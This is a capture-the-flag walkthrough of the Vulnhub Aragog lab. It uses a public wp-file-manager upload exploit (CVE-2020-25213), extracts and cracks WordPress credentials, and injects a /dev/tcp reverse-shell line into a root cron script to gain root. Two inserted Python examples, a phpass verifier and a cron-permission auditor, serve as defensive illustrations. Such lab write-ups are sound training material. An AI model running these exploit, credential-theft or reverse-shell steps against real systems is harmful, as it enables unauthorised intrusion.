Welcome to the HarryPotter-Aragog writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
HarryPotter-Aragog
Tags: Vulnhub, Easy, Linux
Platform: Vulnhub
Difficulty: Easy
OS: Linux
Description
Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -n -sS -T5 -p- 23.6.17.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:26 CEST
Nmap scan report for 23.6.17.212
Host is up (0.000049s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80 23.6.17.212
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:26 CEST
Nmap scan report for Aragog (23.6.17.212)
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms Aragog (23.6.17.212)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
Ok, now we are going to run the vuln scripts from Nmap to see what results they show us.
$ nmap -Pn -p 22,80 23.6.17.212 --script vuln
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:27 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for Aragog (23.6.17.212)
Host is up (0.00036s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
|_ /blog/wp-login.php: Wordpress login page.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)
Port 80
Now we know that there is a directory called blog that contains a Wordpress installation.
When we access the site we see that the styles are not loading. If we open the browser console we can see that it is trying to load the CSS and JS resources from the wordpress.aragog.hogwarts domain, so we are going to add it to our /etc/hosts file.
<script> loading failed with source "http://wordpress.aragog.hogwarts/blog/wp-includes/js/wp-embed.min.js?ver=5.0.12"
Nice, the first post mentions removing plugins for security reasons, so we are going to list the installed plugins.
Wpscan
[i] Plugin(s) Identified:
[+] akismet
| Location: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.12
| Last Updated: 2021-09-03T16:53:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.
[+] wp-file-manager
| Location: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-07-21T04:53:00.000Z
| Readme: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/readme.txt
Exploitation
Perfect, the wp-file-manager plugin is out of date. Searching a little on the internet, we can find a public exploit for it. Let's check if the target is vulnerable.
$ ./rce.sh -u http://wordpress.aragog.hogwarts/blog/ --check
============================================================================================
wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
By: Mansoor R (@time4ster)
============================================================================================
[+] Found wp-file-manager version: 6.0
[+] Version appears to be vulnerable
[+] Target: http://wordpress.aragog.hogwarts/blog/ is vulnerable
Brilliant! Let's exploit it.
$ ./rce.sh -u http://wordpress.aragog.hogwarts/blog/ -f /var/www/html/shells/shell.php
============================================================================================
wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
By: Mansoor R (@time4ster)
============================================================================================
[+] W00t! W00t! File uploaded successfully.
Location: /blog/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php
Now we start a listener in a terminal and request the uploaded file.
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/shell.php
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [23.6.17.150] from (UNKNOWN) [23.6.17.212] 52410
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
00:33:40 up 40 min, 0 users, load average: 0.00, 0.48, 3.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (487): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Aragog:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Aragog:/$
Post exploitation
Privilege escalation: www-data to hagrid98
Enumeration
Linpeas
We are going to run Linpeas to see what useful information we find.
╔══════════╣ Searching passwords in config PHP files
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_USER', 'root');
$pwd = trim( wp_unslash( $_POST[ 'pwd' ] ) );
define('DB_PASSWORD', $pwd);
define('DB_USER', $uname);
define('DB_PASSWORD', 'password_here');
define('DB_USER', 'username_here');
define('DB_USER', 'wordpress');
Great, we have the credentials for the database. We are going to connect to it and list the Wordpress users.
MySQL
www-data@Aragog:/tmp$ mysql -u root -p
[...]
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.100 sec)
[...]
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wpfm_backup |
+-----------------------+
13 rows in set (0.001 sec)
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | hagrid98 | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin | hagrid98@localhost.local | | 2021-03-31 14:21:02 | | 0 | WP-Admin |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)
MariaDB [wordpress]>
Hashcat
Now that we have the hash of hagrid98, let's try to crack it with Hashcat.
$ hashcat -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.0.0) starting...
[...]
$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.:password123
[...]
Started: Thu Sep 9 21:39:24 2021
Stopped: Thu Sep 9 21:39:27 2021
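To show what hashcat mode 400 is actually attacking, here is the phpass "portable" algorithm behind WordPress's $P$ hashes reimplemented in Python (an added example, not code from the writeup or from WordPress). The 12-character prefix carries the iteration count ('B' = 2^13 = 8192 rounds of MD5) and the salt; verifying the hagrid98 hash from wp_users against the cracked candidate shows why such a cheap construction falls to a wordlist in seconds and why a slower hash (bcrypt, Argon2) is the defensive choice.

```python
import hashlib
import hmac

# phpass' own alphabet; the 4th char of the hash indexes into it to give log2(iterations).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def encode64(data, count):
    """phpass' 6-bit encoding (not RFC 4648 base64): 3 bytes -> 4 chars, low bits first."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(setting):
    """Split the 12-char prefix '$P$' + count char + 8-char salt into (iterations, salt)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, setting[4:12]

def crypt_private(password, setting):
    """md5(salt+pw), then `iterations` rounds of md5(prev+pw); result is prefix + encode64."""
    count, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)

def verify_phpass(password, stored):
    """True if `password` reproduces the 34-char `stored` hash (constant-time comparison)."""
    if len(stored) != 34:
        return False
    return hmac.compare_digest(crypt_private(password, stored[:12]), stored)
```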
$ ssh hagrid98@wordpress.aragog.hogwarts
The authenticity of host 'wordpress.aragog.hogwarts (23.6.17.212)' can't be established.
ECDSA key fingerprint is SHA256:Xy+Xj3BR8BLS4rk/l2jfAZmSh0d3m5zJXaB5QsUT3AA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'wordpress.aragog.hogwarts,23.6.17.212' (ECDSA) to the list of known hosts.
hagrid98@wordpress.aragog.hogwarts's password:
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hagrid98@Aragog:~$ id
uid=1000(hagrid98) gid=1000(hagrid98) groups=1000(hagrid98)
hagrid98@Aragog:~$ ls
horcrux1.txt
hagrid98@Aragog:~$ cat horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
We already have the first horcrux:
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
Privilege escalation: hagrid98 to root
Enumeration
Pspy
As we can see, the /opt/.backup.sh script is run with root permissions automatically every minute or so.
hagrid98@Aragog:~$ ./pspy64
[...]
2021/09/10 01:52:01 CMD: UID=0 PID=28512 | /bin/sh -c bash -c "/opt/.backup.sh"
And it contains the following lines.
#!/bin/bash
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
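The misconfiguration here, a root cron job executing a script that a low-privilege user can modify, is what the audit helper below looks for. It is an added example, not from the writeup: it pulls absolute paths out of system-crontab command fields (including the `bash -c "/opt/.backup.sh"` form pspy showed) and reports ownership and permission problems on each script and its directory; `audit_root_script` assumes it runs on the host being checked.

```python
import os
import re
import stat

# Absolute path tokens inside a command string, e.g. the path inside bash -c "...".
ABS_PATH = re.compile(r'(?<![\w.-])/[\w./-]+')

def script_paths_from_crontab(text, system=True):
    """Absolute paths named in the command field of each entry of a (system) crontab."""
    paths = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*=", line):
            continue  # blank line, comment, or VAR=value assignment
        # @reboot-style entries have one time field, normal entries five; system
        # crontabs (/etc/crontab, /etc/cron.d/*) add a user field before the command.
        nfields = (1 if line.startswith("@") else 5) + (1 if system else 0)
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue
        paths.extend(ABS_PATH.findall(parts[nfields]))
    return paths

def script_findings(mode, uid, gid, parent_mode, parent_uid):
    """Reasons a root-executed script can be altered by others, from stat values
    (st_mode/st_uid/st_gid of the script, st_mode/st_uid of its directory). Empty = OK."""
    findings = []
    if uid != 0:
        findings.append("script owned by uid %d, not root" % uid)
    if mode & stat.S_IWGRP and gid != 0:
        findings.append("script writable by group gid %d" % gid)
    if mode & stat.S_IWOTH:
        findings.append("script world-writable")
    if parent_uid != 0:
        findings.append("directory owned by uid %d, not root" % parent_uid)
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        findings.append("directory world-writable without sticky bit (script replaceable)")
    return findings

def audit_root_script(path):
    """Stat `path` and its directory and return the findings (regular files only)."""
    st = os.stat(path)
    if not stat.S_ISREG(st.st_mode):
        return []
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    return script_findings(st.st_mode, st.st_uid, st.st_gid, parent.st_mode, parent.st_uid)

if __name__ == "__main__":
    # Constructed crontab entry mirroring the command pspy reported on this box.
    for p in script_paths_from_crontab('* * * * * root bash -c "/opt/.backup.sh"\n'):
        print(p, audit_root_script(p) if os.path.exists(p) else "(not present)")
```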
Exploitation
All we need to do is inject a reverse shell into the script and start a listener.
#!/bin/bash
sh -i >& /dev/tcp/23.6.17.150/8787 0>&1
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [23.6.17.150] from (UNKNOWN) [23.6.17.212] 52420
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#
And now that we are root we can get the second horcrux.
# ls
horcrux2.txt
# cat horcrux2.txt
[ASCII-art banner: Congratulations]
Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes
You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
# For any queries/suggestions feel free to ping me at email: time4ster@protonmail.com
#
And we already have the second horcrux:
horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
2: maRvoLo GaUnt's riNg deStrOyed bY DUmbledOre